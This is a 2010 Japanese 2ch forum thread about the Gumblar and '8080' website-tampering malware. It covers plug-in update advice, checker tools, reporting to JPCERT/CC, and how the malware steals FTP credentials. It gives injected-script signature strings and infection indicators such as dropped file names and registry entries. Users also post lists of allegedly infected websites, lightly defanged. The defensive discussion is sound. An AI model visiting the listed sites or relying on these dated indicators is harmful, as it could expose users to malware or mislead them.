■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
 ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする (他社製のPDF Readerでもオフにする)
 編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (使っていないならアンインストール)
・旧版が残ったままの場合があるのでアンインストールしてください
・Javascriptとは違うので注意してください
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic

923 :名無しさん@お腹いっぱい。:2010/02/06(土) 02:40:36
とりあえずGumblar Checker 2のリンク先をきちんと修正してくれればいいよ。
勇み足で立てられた方は古いリンクのままであきれた。

924 :名無しさん@お腹いっぱい。:2010/02/06(土) 02:43:29
Unleakやイージスガードでパスワードの入ったフォルダをアクセス禁止にするのではだめなの?

925 :名無しさん@お腹いっぱい。:2010/02/06(土) 02:51:13
>>921
細かく言って申し訳ないがここは
> ■Gumblar(たぶん消滅済)
> 2009/4〜6に猛威を振るったやつ。
> GENOの対応の悪さが「GENOウイルス」という言葉を生み出した。

Gumblar(たぶん消滅済)別名GENOウイルスではどうかな
GENOウイルスで当初は始まったのだし

926 :906:2010/02/06(土) 03:22:57
>>922 の続き

【アップデート支援ツール】
■ アプリケーションの脆弱性確認ツール
・MyJVN バージョンチェッカ
ttp://jvndb.jvn.jp/apis/myjvn/
・Secunia Personal Software Inspector (PSI)
ttp://secunia.com/vulnerability_scanning/personal/
■ Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
ttp://www.forest.impress.co.jp/docs/review/20091020_323014.html
ttp://hide9999.web.fc2.com/

【改ざんWebサイトの届出先】
メールで該当サイトに通報する時は
CCにJPCERT/CCのメアドも入れると二度手間が省けます
■ JPCERT コーディネーションセンター (JPCERT/CC)
ttps://www.jpcert.or.jp/
・Web サイト改ざんに関する情報提供のお願い
ttp://www.jpcert.or.jp/pr/2010/pr100001.txt
・インシデントの届出
ttps://form.jpcert.or.jp/
・記入例
ttp://www.jpcert.or.jp/pr/2010/form.png
■ Google Safe Browsing: Report a Malware Page
ttp://www.google.com/safebrowsing/report_badware/

927 :906:2010/02/06(土) 03:24:44
【改ざんサイトの調査など】
■ チェッカーサイト
・Gumblar Checker 2 (主に"8080系"用。作者様がソースを公開して下さいました。下記は互換サイト)
ttp://gumblar.s1.dynamitelife.net/
・Gumblar.X Checker ("Gumblar.X"用)
ttp://gumblar.s1.dynamitelife.net/gumx/
・aguse
ttp://www.aguse.net/
・飛び先のチェック by ぴょん基地の友達
ttp://www.kakiko.com/check/sample.html
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
・Dr.Web online check
ttp://online.us.drweb.com/?url=1

928 :906:2010/02/06(土) 03:25:52
■ 専ブラで右クリからの検索を有効にする方法。
設定例:JaneView

設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。

これで専ブラから検索でチェックできるようになります。

以下がそのコマンドの一例になります。
Gumblar Checker2=http://gumblar.s1.dynamitelife.net/index.php?url=$LINK&hids=on&code=on&chk=AUTO
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK

929 :名無しさん@お腹いっぱい。:2010/02/06(土) 03:27:51
>>926
これ見れないけど俺だけかな?
・MyJVN バージョンチェッカ
ttp://jvndb.jvn.jp/apis/myjvn/

930 :906:2010/02/06(土) 03:29:54
【8080系ウイルスについて】
メディアなどでは「ガンブラー(の亜種)」と紹介されていますが
Gumblar系とは別種のウイルスで動作も異なります
以前はページソースの最後あたりに<script>タグから始まる
『/*Exception*/』『/*LGPL*/』『/*CODE1*/』『/*GNU GPL*/』
などの文字列を先頭に、難読化したスクリプトが埋め込まれていましたが
最近のものは難読化されていないものや上記の文字列の
ないものが出現していますので注意が必要です
Adobe Reader 9.2およびそれ以前の脆弱性を利用しているため
9.3以降の最新版にアップデートしてください
他にもMicrosoftとJRE(Java Runtime Environment)の脆弱性を
利用していますので、こちらもアップデートが必要です

感染すると所有するWebサイトのFTPのアカウントとパスワードを盗み
外部からサイトを改ざんされてウイルスを配布するようになります
特にレジストリなどからFTPソフトの設定を読み取るので
万一を考えてアカウントとパスワードは保存しないほうが賢明です
あとWebブラウザのInternet Explorer 6とOperaのアカウント情報も
盗むそうなのでバージョンアップやマスターパスワードを使って暗号化など
対策を考えてください

また偽セキュリティソフトなど他のウイルスを呼び込むため非常に危険です
感染したWebサイトの運営者の方はサイトを閉鎖して
ウイルスのない安全なPCからパスワードの変更をお願いします
■ 相次ぐサイト改ざん(1) 注意が必要なのは「ガンブラー」ではなく「8080」
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2115
■ 「ガンブラー攻撃」対象ソフトをJPCERTが確認〜アカウント情報盗み外部送信
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2143
■ 「ガンブラー攻撃」対象ソフトをJPCERTが確認〜サイト管理者の注意点は?
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2144

931 :906:2010/02/06(土) 03:31:30
■ Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1f6c515039f6cb6a45d78e22d06cf05ce&format=html
■ 8080系の感染確認(2000,XP)
あくまで現時点での確認方法であることに注意してください

セーフモードから起動して
スタートアップ
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\
に"siszyd32.exe"や"wwwpos32.exe"など見知らぬ実行ファイルがあれば感染済

またはレジストリエディタでRunエントリ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
から
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
等の登録があれば感染済です

932 :906:2010/02/06(土) 03:33:42
【Gumblar.x / Daonol(新GENO)ウイルスについて】
■ Gumblar被害拡大中(1)(2)(3)
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2092
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2093
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2094
■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
Win32/Daonolの亜種に感染!セーフモードでも起動できないパソコンを復旧するには?
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/?ST=security&P=1
レジストリの修復 Windowsを使わずに修復してみる
ttp://pctrouble.lessismore.cc/boot/recover_registry.html
■ 感染確認・駆除ツール
アンラボ(v3daonol.exe)
ttp://www.ahnlab.co.jp/download/vdn_list.asp
マカフィー(stinger.exe)
ttp://www.mcafee.com/japan/mcafee/support/announcement20091127.asp
Kaspersky(KatesKiller.exe)
ttp://support.kaspersky.com/faq/?qid=208280701

【旧Gumblar(GENO)ウイルスのまとめなど】
*** 【注意!】2009年10月からのGumblar.x / Daonol(新GENO)には無効な情報があります ***
■ Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
■ GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/

933 :906:2010/02/06(土) 03:36:19
途中でうっかり連続投稿規制にひっかかったorz
一部変更していないものもあるが、とりあえず以上で終了

934 :名無しさん@お腹いっぱい。:2010/02/06(土) 03:37:41
>>933
おつおつ〜
遠慮していたけどもっと間にレス入れたらよかったスマン

935 :名無しさん@お腹いっぱい。:2010/02/06(土) 03:50:27
>>929
Googleのキャッシュで見つけたが
メンテナンス中らしい

■JVN iPedia、MyJVN システムメンテナンスのお知らせ
下記の期間、システムメンテナンスのため、サービスがご利用頂けません。
ご不便をおかけいたしますが、ご理解いただきますようお願い申し上げます。

2010年02月05日(金) 18:30 〜 2010年02月08日(月) 12:00

936 :名無しさん@お腹いっぱい。:2010/02/06(土) 04:00:50
>>935
メンテナンスの件は入れなくても大丈夫な期間だね
もし期間中ならレスですむし

937 :45:2010/02/06(土) 04:08:00 ?2BP(1236)
>>912
でじろくにつーほーしますた。

938 :名無しさん@お腹いっぱい。:2010/02/06(土) 04:29:38
Gumblar.X Checkerのjaneでのリンク先お願いします

939 :名無しさん@お腹いっぱい。:2010/02/06(土) 07:23:36
>>921

> ■Gumblar.x
> 2009/10〜12に出現。
> 挿入するコードがGumblarのそれと同じだった為、
> Gumblarの進化型(亜種?)と言われていた。
> Gumblar.xは12月中旬にコードごと消滅、以後追跡不能。
> ※残骸が残っているサイトがあるが、現在は基本的に無害。

>>852で復活が報告されている

940 :名無しさん@お腹いっぱい。:2010/02/06(土) 07:50:36
次のテンプレにはこれが入ると思ってたけど、案に入ってなかったのは意外だった
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html

941 :名無しさん@お腹いっぱい。:2010/02/06(土) 08:02:19
>>939,940
>>921 修正
こんなところでどうだ?
本格始動するようなら仮称でカテゴリ分けるということで

【Gumblar】混ぜるな危険【8080系】

■Gumblar(いわゆるGENOウイルス。たぶん消滅済)
2009/4〜6に猛威を振るったやつ。
GENOの対応の悪さが「GENOウイルス」という言葉を生み出した。

■Gumblar.x
> 2009/10〜12に出現。
> 挿入するコードがGumblarのそれと同じだった為、
> Gumblarの進化型(亜種?)と言われていた。
> Gumblar.xは12月中旬にコードごと消滅、以後追跡不能。
> ※残骸が残っているサイトがあるが、現在は基本的に無害。
だったが2010/2/5あたりからGumblar.xと同系らしき改ざんが
出現している模様で、これから注意が必要。名前は募集中。

■8080系(GNU GPL、CODE1、LGPL、Exception、DEBUG)
Gumblar.xが消滅した直後に出現し、今現在も猛威を振るっている。
※セキュリティソフト依存の防御は非常に危険です。

8080系は、Gumblar用の対策方法には載ってない
「Java(JRE)」の脆弱性を突いているので、Gumblarと8080系を混同して
Gumblar用の対策を施し、「これで大丈夫(キリッ」とか言ってると、
踏んだ地雷が爆発→→→ \(^o^)/オワタ なんて事に(なるかも?)

【参考】
■ 「ガンブラー」「サイト改ざん」めぐる基本のQ&A 〜 何が起きている? 対策は?
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html

942 :名無しさん@お腹いっぱい。:2010/02/06(土) 08:14:43
ガンブラだろうが8080だろうが
やってる仕組みは大して変わらんから
同じスレでやってんだろ
ガン部ラーの亜種で間違ってんのカ
スクリプトの書き方が違う!!とか

943 :名無しさん@お腹いっぱい。:2010/02/06(土) 08:17:09
「Java(JRE)」の脆弱性を突いている!!
とかも
どんなソフトも一通り最新にしとくのが重要ってだけ
それはずっといっしょ
8080のの対策を施し、「これで大丈夫(キリッ」とか言ってると、…

944 :名無しさん@お腹いっぱい。:2010/02/06(土) 08:22:19
テンプレ?
長すぎるしくだらない煽りついてるし

945 :名無しさん@お腹いっぱい。:2010/02/06(土) 08:27:12
修正希望なら、具体的に指摘しましょう。

946 :名無しさん@お腹いっぱい。:2010/02/06(土) 08:27:49
>>941
Gumblar.xの項目の
>名前は募集中。

この部分は必要ない気がする。余計に混乱しそう
もしベンダーなりが名付けたらまたその時に考えれば良いんじゃないの?

正直、長々としたテンプレが必要なのかって気はするが…カテゴリー分けなんてSo-netなりそこらの記事のリンクだけで良いような気がする
細かくやりすぎると古くなってからの変更も大変
そもそもこのスレは改竄ウイルス総合スレであってGumblarのみを扱うスレじゃないし…そのためにGENOスレから派生した訳で

947 :名無しさん@お腹いっぱい。:2010/02/06(土) 08:31:28
>>920
>>922
>>926
だけでよい
混ぜるな危険あたりは全部要らない


948 :名無しさん@お腹いっぱい。:2010/02/06(土) 08:40:27
Gumblarも8080も
同じような脆弱性つかって同じような感染経路で
同じような被害をもたらす
なら同じようなものじゃないの
亜種?とどう違うの
定義分からないわ

949 :名無しさん@お腹いっぱい。:2010/02/06(土) 08:51:43
>>948
まあまずはここ読んでこい。長いからって途中で投げ出すなよw
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html

Gumblar.xなり8080系なり明確に区別する必要はあると思う。特にこのスレでは
でもテンプレにそれを詳細に書くことはどうかなと個人的には思うな
Gumblar系に感染しないための対策方法は共通と言って良いだろうけどね。ゼロデイ使われることが無い限り

950 :949:2010/02/06(土) 08:54:44
ちょっと紛らわしい表現になったような気がしたので修正…

×Gumblar系に感染しないための対策方法は共通と言って良いだろうけどね。ゼロデイ使われることが無い限り

○Gumblar系、8080系に感染しないための対策方法は共通と言って良いだろうけどね。ゼロデイ使われることが無い限り

951 :名無しさん@お腹いっぱい。:2010/02/06(土) 08:56:38
呼んだけど似たようなもんじゃん

952 :名無しさん@お腹いっぱい。:2010/02/06(土) 08:58:09
「編集部では」GumblarやGumblar.xとは別の系統の攻撃だと考えています。  


953 :名無しさん@お腹いっぱい。:2010/02/06(土) 08:59:07
こういう似たようなもんじゃんで済ましてしまうユーザーに説明するのが一番難しいとこだよね、マルウェアの問題って

954 :名無しさん@お腹いっぱい。:2010/02/06(土) 09:00:15
ほんとに違うなら違うページで説明されるワナ

955 :名無しさん@お腹いっぱい。:2010/02/06(土) 09:02:36
この作者結構な金額の金かけてるよね

956 :名無しさん@お腹いっぱい。:2010/02/06(土) 09:10:11
>>941
>>947の言ってる3つにこれを加えるだけでいい

■ 「ガンブラー」「サイト改ざん」めぐる基本のQ&A 〜 何が起きている? 対策は?
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html

957 :名無しさん@お腹いっぱい。:2010/02/06(土) 09:13:03
JAVAのコンパネから、アップデートの自動更新を毎日に変更してるんだけど、
何度やっても毎月に戻ってる。どうしたらいい?

958 :名無しさん@お腹いっぱい。:2010/02/06(土) 09:13:27
害虫が駆除できるなら種類には興味ない人と
害虫そのものの研究者が話合わないか

まあここどういうスレにしたいかってことかね


959 :名無しさん@お腹いっぱい。:2010/02/06(土) 09:17:37
議論が長引くようなら >>913 の↓このスレで話しようぜ

【Gumblar/GENO】Web改竄ウイルス総合スレ5【8080】
http://pc11.2ch.net/test/read.cgi/sec/1265387369/

960 :名無しさん@お腹いっぱい。:2010/02/06(土) 09:35:35
ふとJREコンパネからみたら Version 6 Update 18がでてたのか
セキュリティ関係ないからか
Secuniaがなんも言わんかったしインストールせんでもいいのかなー


961 :名無しさん@お腹いっぱい。:2010/02/06(土) 10:01:54
>>957
レジストリの書き込み権限がないからだろ
コンパネからではなく、javacpl.exeなりcplなりを管理者として実行

962 :名無しさん@お腹いっぱい。:2010/02/06(土) 11:31:21
>>960
バグ300個以上抱えたままでよければ。

963 :名無しさん@お腹いっぱい。:2010/02/06(土) 12:57:08
Gumblar.X Checkerで
チェックパターンを強化しました
http://gumblar.s1.dynamitelife.net/gumx/

964 :名無しさん@お腹いっぱい。:2010/02/06(土) 15:15:09
Gumblar?、未通報

p://jmsdf.sakura.ne.jp/p/

965 :名無しさん@お腹いっぱい。:2010/02/06(土) 15:51:25
      ζ
      / ̄ ̄ ̄ ̄\
     /         \
    /\    \  / |
    |||||||   (・)  (・) |
    (6-------◯⌒つ | < バカモ〜ン! また直リンしおって!
    |    _||||||||| |
     \ / \_/ /
       \____/


966 :名無しさん@お腹いっぱい。:2010/02/06(土) 16:09:04
>>964
tp://jmsdf●sakura●ne●jp/p/CSScriptLib●js
に仕込まれてるね

967 :名無しさん@お腹いっぱい。:2010/02/06(土) 17:52:11
電子の海にも海自が必要ですな

968 :名無しさん@お腹いっぱい。:2010/02/06(土) 20:19:14
中国にまかせろ!

969 :名無しさん@お腹いっぱい。:2010/02/06(土) 20:21:48
だが断る

970 :名無しさん@お腹いっぱい。:2010/02/06(土) 21:39:07
celeb-deaeru●com
bihada5●nes3●com
ggpurasu●com/PS2
gu-zu●com
kyoshin-jp●com
www●custom-mode●com

971 :名無しさん@お腹いっぱい。:2010/02/06(土) 21:43:33
感染サイト多いの納得
torrentのスレなんかにめちゃくちゃ貼り付けてる方がいます。どうにかならないのですか?

972 :名無しさん@お腹いっぱい。:2010/02/06(土) 21:44:50
なんでtorrentのスレ見てるんですか?

973 :名無しさん@お腹いっぱい。:2010/02/06(土) 21:46:36
見たいからw

974 :名無しさん@お腹いっぱい。:2010/02/06(土) 21:49:43
more-more●net

975 :名無しさん@お腹いっぱい。:2010/02/06(土) 22:01:29
レンタルブログにコード張っとけば馬鹿な管理者が見て全員に・・・とか怖いな

976 :名無しさん@お腹いっぱい。:2010/02/06(土) 22:25:28
おぉっ!
8080系 スクリプト大幅に変更してないか?
何やってんだこれ。。。


977 :名無しさん@お腹いっぱい。:2010/02/06(土) 22:26:18 ?PLT(19010)
【Gumblar/GENO】Web改竄ウイルス総合スレ5【8080】
http://pc11.2ch.net/test/read.cgi/sec/1265387369/

次スレおつ

978 :名無しさん@お腹いっぱい。:2010/02/06(土) 22:27:34
そのスレって要らない子でしょ?

979 :名無しさん@お腹いっぱい。:2010/02/06(土) 22:45:21
ここまでGumblarChecker 2ですべて検出可能

980 :名無しさん@お腹いっぱい。:2010/02/07(日) 00:13:36
http://headlines.yahoo.co.jp/hl?a=20100206-00000855-yom-soci

981 :名無しさん@お腹いっぱい。:2010/02/07(日) 00:29:41
>>980
クレカ情報窃取の可能性って・・・
なにそれ怖い

982 :名無しさん@お腹いっぱい。:2010/02/07(日) 00:32:47
スレ違い

983 :名無しさん@お腹いっぱい。:2010/02/07(日) 00:37:14
いつかガンブラからも出るだろうな
今のところクレジットカードは盗まれてないようだけど

984 :名無しさん@お腹いっぱい。:2010/02/07(日) 00:48:45
>927
> ・WebGetter
> ttp://rd.or.tp/get.php

なんか繋がりにくいんだけどサイト落ちてるの?


985 :45:2010/02/07(日) 02:08:42 ?2BP(1236)
>>970の一番目(ぐぐるびんぐキャッシュ無印)と>>974(ぐぐるキャッシュ無印びんぐキャッシュ/*LGPL*/)は今は見当たらないようです。。。
他、めるぽしたり、でじろしたり。

986 :45:2010/02/07(日) 02:45:21 ?2BP(1236)
またまた見落とし。。。
>>964
めるぽしました。

987 :名無しさん@お腹いっぱい。:2010/02/07(日) 12:45:49
【社会】「Firefox」のアドオン2つからトロイの木馬を検出…導入するとマルウェアに感染する恐れ
http://tsushima.2ch.net/test/read.cgi/newsplus/1265499507/

988 :名無しさん@お腹いっぱい。:2010/02/07(日) 12:51:08
別物でしょ

989 :名無しさん@お腹いっぱい。:2010/02/07(日) 16:20:58
早漏スレに逝ってるのがいるから悪いがageる。ここ埋まって無いし
テンプレ修正案出ているのを知らないようだから

【Gumblar/GENO】Web改竄ウイルス総合スレ5【8080】
http://pc11.2ch.net/test/read.cgi/sec/1265387369/


990 :名無しさん@お腹いっぱい。:2010/02/07(日) 16:48:50
早漏とかテンプレとかどうでもいいことで騒ぐのかまた

991 :名無しさん@お腹いっぱい。:2010/02/07(日) 16:50:29
火狐野郎ざまあ

992 :名無しさん@お腹いっぱい。:2010/02/07(日) 16:56:05
うめ

993 :名無しさん@お腹いっぱい。:2010/02/07(日) 17:12:59
p://interiorshop●jp/
p://www.eonet.ne●jp/~inoue-clinic/


994 :名無しさん@お腹いっぱい。:2010/02/07(日) 18:00:00
>>993
>>568 >>747 で既出

995 :名無しさん@お腹いっぱい。:2010/02/07(日) 18:10:29
>>989
906のテンプレ修正案はそれほどアドバンテージは無いので
次スレはそのままそこでいいよ

996 :名無しさん@お腹いっぱい。:2010/02/07(日) 18:18:55
>>993
上:凸完了
下:留守に付き、明日以降凸予定

>>944
既出ではあっても二度目の報告がある事を憂慮すべきかと

997 :名無しさん@お腹いっぱい。:2010/02/07(日) 18:19:34
>>994
スクリプト変わった?

998 :994:2010/02/07(日) 18:26:09
スマン
再発かどうかは俺にはわからない
と一言入れておくべきだった

999 :名無しさん@お腹いっぱい。:2010/02/07(日) 18:44:12
うめ

1000 :名無しさん@お腹いっぱい。:2010/02/07(日) 18:46:23


1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

229 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)